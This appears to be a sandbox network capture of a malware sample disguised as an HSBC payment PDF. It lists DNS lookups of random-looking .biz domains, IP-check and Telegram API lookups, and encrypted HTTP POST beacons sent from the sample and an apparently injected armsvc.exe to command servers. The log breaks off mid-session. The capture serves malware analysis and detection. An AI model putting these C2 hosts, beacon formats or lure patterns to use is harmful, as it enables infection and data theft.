Dec 10, 2024 16:26:11.153460979 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
Dec 10, 2024 16:26:12.340123892 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
Dec 10, 2024 16:26:12.340250969 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
Dec 10, 2024 16:26:12.340301037 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:12.340301037 CET | 49978 | 80 | 192.168.2.7 | 44.221.84.105
Dec 10, 2024 16:26:12.460459948 CET | 80 | 49978 | 44.221.84.105 | 192.168.2.7
Dec 10, 2024 16:26:13.559483051 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:13.685396910 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:13.685497046 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:13.685950994 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:13.685950994 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:13.806757927 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:13.806847095 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:16.152347088 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:16.152421951 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:16.152518988 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:16.152580976 CET | 49984 | 80 | 192.168.2.7 | 18.141.10.107
Dec 10, 2024 16:26:16.271867037 CET | 80 | 49984 | 18.141.10.107 | 192.168.2.7
Dec 10, 2024 16:26:16.691895962 CET | 49990 | 80 | 192.168.2.7 | 172.234.222.143
Dec 10, 2024 16:26:16.815881014 CET | 80 | 49990 | 172.234.222.143 | 192.168.2.7
Dec 10, 2024 16:26:16.815989971 CET | 49990 | 80 | 192.168.2.7 | 172.234.222.143
Dec 10, 2024 16:26:16.889905930 CET | 49990 | 80 | 192.168.2.7 | 172.234.222.143
Dec 10, 2024 16:26:16.889938116 CET | 49990 | 80 | 192.168.2.7 | 172.234.222.143
Dec 10, 2024 16:26:17.009995937 CET | 80 | 49990 | 172.234.222.143 | 192.168.2.7
Dec 10, 2024 16:26:17.014801025 CET | 80 | 49990 | 172.234.222.143 | 192.168.2.7
Dec 10, 2024 16:26:17.973221064 CET | 80 | 49990 | 172.234.222.143 | 192.168.2.7
Dec 10, 2024 16:26:18.093559027 CET | 49990 | 80 | 192.168.2.7 | 172.234.222.143
Dec 10, 2024 16:26:18.218674898 CET | 49995 | 80 | 192.168.2.7 | 72.52.179.174
Dec 10, 2024 16:26:18.338382959 CET | 80 | 49995 | 72.52.179.174 | 192.168.2.7
Dec 10, 2024 16:26:18.338541031 CET | 49995 | 80 | 192.168.2.7 | 72.52.179.174
Dec 10, 2024 16:26:18.338757992 CET | 49995 | 80 | 192.168.2.7 | 72.52.179.174
Dec 10, 2024 16:26:18.458513975 CET | 80 | 49995 | 72.52.179.174 | 192.168.2.7
Dec 10, 2024 16:26:19.515204906 CET | 80 | 49995 | 72.52.179.174 | 192.168.2.7
Dec 10, 2024 16:26:19.734239101 CET | 49995 | 80 | 192.168.2.7 | 72.52.179.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 16:24:11.692176104 CET | 59158 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:12.284240007 CET | 53 | 59158 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:12.329438925 CET | 63231 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:12.470489979 CET | 53 | 63231 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:14.279803038 CET | 61029 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:14.417388916 CET | 53 | 61029 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:14.483979940 CET | 57309 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:15.087081909 CET | 53 | 57309 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:16.758785009 CET | 51270 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:16.896429062 CET | 53 | 51270 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:17.320835114 CET | 63479 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:17.888187885 CET | 53 | 63479 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:19.446871996 CET | 61579 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:20.039160013 CET | 53 | 61579 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:22.340003967 CET | 64298 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:22.874125004 CET | 53 | 64298 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:24.708389997 CET | 52962 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:24.711930990 CET | 55159 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:24.849324942 CET | 53 | 55159 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:25.054045916 CET | 53 | 52962 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:26.351454020 CET | 51696 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:26.787070990 CET | 53 | 51696 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:28.760263920 CET | 50420 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:28.997746944 CET | 53 | 50420 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:28.998497963 CET | 63892 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:29.791650057 CET | 53 | 63892 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:32.078995943 CET | 64503 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:32.319088936 CET | 53 | 64503 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:32.319715023 CET | 63108 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:32.560697079 CET | 53 | 63108 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:24:32.561521053 CET | 57303 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:24:33.501580954 CET | 53 | 57303 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:25:17.876512051 CET | 62669 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:25:18.856405973 CET | 53 | 62669 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:04.117433071 CET | 51551 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:04.720539093 CET | 53 | 51551 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:07.243876934 CET | 54928 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:07.969813108 CET | 53 | 54928 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:10.187421083 CET | 62649 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:10.760751009 CET | 53 | 62649 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:12.341001987 CET | 61702 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:12.949174881 CET | 53 | 61702 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:16.153940916 CET | 52346 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:16.651339054 CET | 53 | 52346 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:17.978765965 CET | 56066 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:18.217648983 CET | 53 | 56066 | 1.1.1.1 | 192.168.2.7
Dec 10, 2024 16:26:19.518667936 CET | 59640 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:26:19.951618910 CET | 53 | 59640 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 16:24:11.692176104 CET | 192.168.2.7 | 1.1.1.1 | 0x2d01 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:12.329438925 CET | 192.168.2.7 | 1.1.1.1 | 0x119 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.279803038 CET | 192.168.2.7 | 1.1.1.1 | 0x27e3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.483979940 CET | 192.168.2.7 | 1.1.1.1 | 0x6e7b | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:16.758785009 CET | 192.168.2.7 | 1.1.1.1 | 0x1c3b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:17.320835114 CET | 192.168.2.7 | 1.1.1.1 | 0x98fb | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:19.446871996 CET | 192.168.2.7 | 1.1.1.1 | 0x6dba | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:22.340003967 CET | 192.168.2.7 | 1.1.1.1 | 0xc542 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:24.708389997 CET | 192.168.2.7 | 1.1.1.1 | 0xc858 | Standard query (0) | ww99.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:24.711930990 CET | 192.168.2.7 | 1.1.1.1 | 0x73ce | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:26.351454020 CET | 192.168.2.7 | 1.1.1.1 | 0x5c77 | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:28.760263920 CET | 192.168.2.7 | 1.1.1.1 | 0xe5d3 | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:28.998497963 CET | 192.168.2.7 | 1.1.1.1 | 0x8650 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:32.078995943 CET | 192.168.2.7 | 1.1.1.1 | 0xbaa2 | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:32.319715023 CET | 192.168.2.7 | 1.1.1.1 | 0x5083 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:32.561521053 CET | 192.168.2.7 | 1.1.1.1 | 0x6b91 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:17.876512051 CET | 192.168.2.7 | 1.1.1.1 | 0xa568 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:04.117433071 CET | 192.168.2.7 | 1.1.1.1 | 0xdbc9 | Standard query (0) | xlfhhhm.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:07.243876934 CET | 192.168.2.7 | 1.1.1.1 | 0xc9d2 | Standard query (0) | ifsaia.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:10.187421083 CET | 192.168.2.7 | 1.1.1.1 | 0xd867 | Standard query (0) | saytjshyf.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:12.341001987 CET | 192.168.2.7 | 1.1.1.1 | 0x2591 | Standard query (0) | vcddkls.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:16.153940916 CET | 192.168.2.7 | 1.1.1.1 | 0x205d | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:17.978765965 CET | 192.168.2.7 | 1.1.1.1 | 0x9027 | Standard query (0) | ww99.fwiwk.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:19.518667936 CET | 192.168.2.7 | 1.1.1.1 | 0x910c | Standard query (0) | ww12.fwiwk.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 16:24:12.284240007 CET | 1.1.1.1 | 192.168.2.7 | 0x2d01 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:12.470489979 CET | 1.1.1.1 | 192.168.2.7 | 0x119 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:14.417388916 CET | 1.1.1.1 | 192.168.2.7 | 0x27e3 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:15.087081909 CET | 1.1.1.1 | 192.168.2.7 | 0x6e7b | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:16.896429062 CET | 1.1.1.1 | 192.168.2.7 | 0x1c3b | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:16.896429062 CET | 1.1.1.1 | 192.168.2.7 | 0x1c3b | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:17.888187885 CET | 1.1.1.1 | 192.168.2.7 | 0x98fb | No error (0) | cvgrf.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:20.039160013 CET | 1.1.1.1 | 192.168.2.7 | 0x6dba | No error (0) | npukfztj.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:22.874125004 CET | 1.1.1.1 | 192.168.2.7 | 0xc542 | No error (0) | przvgke.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:22.874125004 CET | 1.1.1.1 | 192.168.2.7 | 0xc542 | No error (0) | przvgke.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:24.849324942 CET | 1.1.1.1 | 192.168.2.7 | 0x73ce | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:25.054045916 CET | 1.1.1.1 | 192.168.2.7 | 0xc858 | No error (0) | ww99.przvgke.biz |  | 72.52.179.174 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:26.787070990 CET | 1.1.1.1 | 192.168.2.7 | 0x5c77 | No error (0) | ww12.przvgke.biz | 084725.parkingcrew.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:24:26.787070990 CET | 1.1.1.1 | 192.168.2.7 | 0x5c77 | No error (0) | 084725.parkingcrew.net |  | 76.223.26.96 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:26.787070990 CET | 1.1.1.1 | 192.168.2.7 | 0x5c77 | No error (0) | 084725.parkingcrew.net |  | 13.248.148.254 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:28.997746944 CET | 1.1.1.1 | 192.168.2.7 | 0xe5d3 | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:29.791650057 CET | 1.1.1.1 | 192.168.2.7 | 0x8650 | No error (0) | knjghuig.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:32.319088936 CET | 1.1.1.1 | 192.168.2.7 | 0xbaa2 | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:32.560697079 CET | 1.1.1.1 | 192.168.2.7 | 0x5083 | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:24:33.501580954 CET | 1.1.1.1 | 192.168.2.7 | 0x6b91 | No error (0) | lpuegx.biz |  | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:25:18.856405973 CET | 1.1.1.1 | 192.168.2.7 | 0xa568 | No error (0) | vjaxhpbji.biz |  | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:04.720539093 CET | 1.1.1.1 | 192.168.2.7 | 0xdbc9 | No error (0) | xlfhhhm.biz |  | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:07.969813108 CET | 1.1.1.1 | 192.168.2.7 | 0xc9d2 | No error (0) | ifsaia.biz |  | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:10.760751009 CET | 1.1.1.1 | 192.168.2.7 | 0xd867 | No error (0) | saytjshyf.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:12.949174881 CET | 1.1.1.1 | 192.168.2.7 | 0x2591 | No error (0) | vcddkls.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:16.651339054 CET | 1.1.1.1 | 192.168.2.7 | 0x205d | No error (0) | fwiwk.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:16.651339054 CET | 1.1.1.1 | 192.168.2.7 | 0x205d | No error (0) | fwiwk.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:18.217648983 CET | 1.1.1.1 | 192.168.2.7 | 0x9027 | No error (0) | ww99.fwiwk.biz |  | 72.52.179.174 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:19.951618910 CET | 1.1.1.1 | 192.168.2.7 | 0x910c | No error (0) | ww12.fwiwk.biz | 084725.parkingcrew.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 16:26:19.951618910 CET | 1.1.1.1 | 192.168.2.7 | 0x910c | No error (0) | 084725.parkingcrew.net |  | 13.248.148.254 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:26:19.951618910 CET | 1.1.1.1 | 192.168.2.7 | 0x910c | No error (0) | 084725.parkingcrew.net |  | 76.223.26.96 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 54.244.188.177 | 80 | 3232 | C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:13.038033962 CET | 351 | OUT | POST /mgppdv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 898
Dec 10, 2024 16:24:13.038115978 CET | 898 | OUT | Data Raw: (binary request body, 898 bytes, not printable)
Dec 10, 2024 16:24:14.337663889 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 15:24:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3dab21979f5b10af5d915d23a3c4b082|8.46.123.175|1733844254|1733844254|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 54.244.188.177 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:13.134259939 CET | 361 | OUT | POST /leanpmxsxneexgiv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 10, 2024 16:24:13.134322882 CET | 850 | OUT | Data Raw: (binary request body, 850 bytes, not printable)
Dec 10, 2024 16:24:14.474680901 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 15:24:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=29de6c1007c751a72c85120a3480a41f|8.46.123.175|1733844254|1733844254|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | 2724 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:14.544823885 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 10, 2024 16:24:15.817994118 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 15:24:15 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: daa271d8caefb955d4e0a3a7dd57b23f
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 16:24:15.823390961 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 10, 2024 16:24:16.229127884 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 15:24:16 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 801637083f0acea40bf13f0b66973778
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 16:24:23.931077003 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 10, 2024 16:24:24.335911989 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 15:24:24 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 0cb2bb90e36cfeca33f9b72364920757
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49709 | 18.141.10.107 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:15.244730949 CET | 346 | OUT | POST /udp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 10, 2024 16:24:15.244730949 CET | 850 | OUT | Data Raw: ea 44 5f 04 e3 cf a4 c8 46 03 00 00 e3 bd 46 bb 46 6a 25 d2 a0 24 aa eb 50 bf 14 c7 b6 68 82 b9 48 b0 fd 9a 85 77 17 a4 46 26 77 f2 53 5d 44 a0 a1 79 a4 e9 70 46 01 90 6c 02 9e 4e bf 64 7b 3d 7d 37 9a 14 65 e3 50 b6 91 9e f4 83 20 37 01 33 18 36
    Data Ascii: D_FFFj%$PhHwF&wS]DypFlNd{=}7eP 736&OjnR*r&6QOi2%A{TU62h]}{pCvY((JTQ,%0~773)b4"<e*C{0OKT0{TJx)xfy$
Dec 10, 2024 16:24:17.245935917 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 15:24:16 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=18b7adbf3b884eb70f95b61fc4681eda|8.46.123.175|1733844256|1733844256|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49716 | 54.244.188.177 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:18.081989050 CET | 353 | OUT | POST /hfsfqfqbrwib HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 10, 2024 16:24:18.082005024 CET | 850 | OUT | Data Raw: 7a c3 bc 44 82 b7 ff 60 46 03 00 00 5c ef b5 f7 08 1b 79 dc 94 e0 69 10 91 59 8f 4c 71 f5 c9 41 ea 53 42 1e 2c b7 ac f1 62 7f f0 cb 86 a8 b1 aa 6d 72 ee 3a 13 92 0a 1c 64 98 0c 5d e4 97 04 6e 8d 8a 3e 2e cf 0f f2 c4 f4 80 26 df e4 c6 25 70 5d 16
    Data Ascii: zD`F\yiYLqASB,bmr:d]n>.&%p]RdTBW7'4T4S2|:sU1w4pi$_" L9rc"UjK{%avwXno~A+uS-Q']koX2SFv5S[xK*DO"=*cmoC[
Dec 10, 2024 16:24:19.430260897 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 15:24:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=96ffce8178e8ca5aff1049ce61b5f9aa|8.46.123.175|1733844259|1733844259|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49727 | 44.221.84.105 | 80 | 6336 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:21.235524893 CET | 346 | OUT | POST /bd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
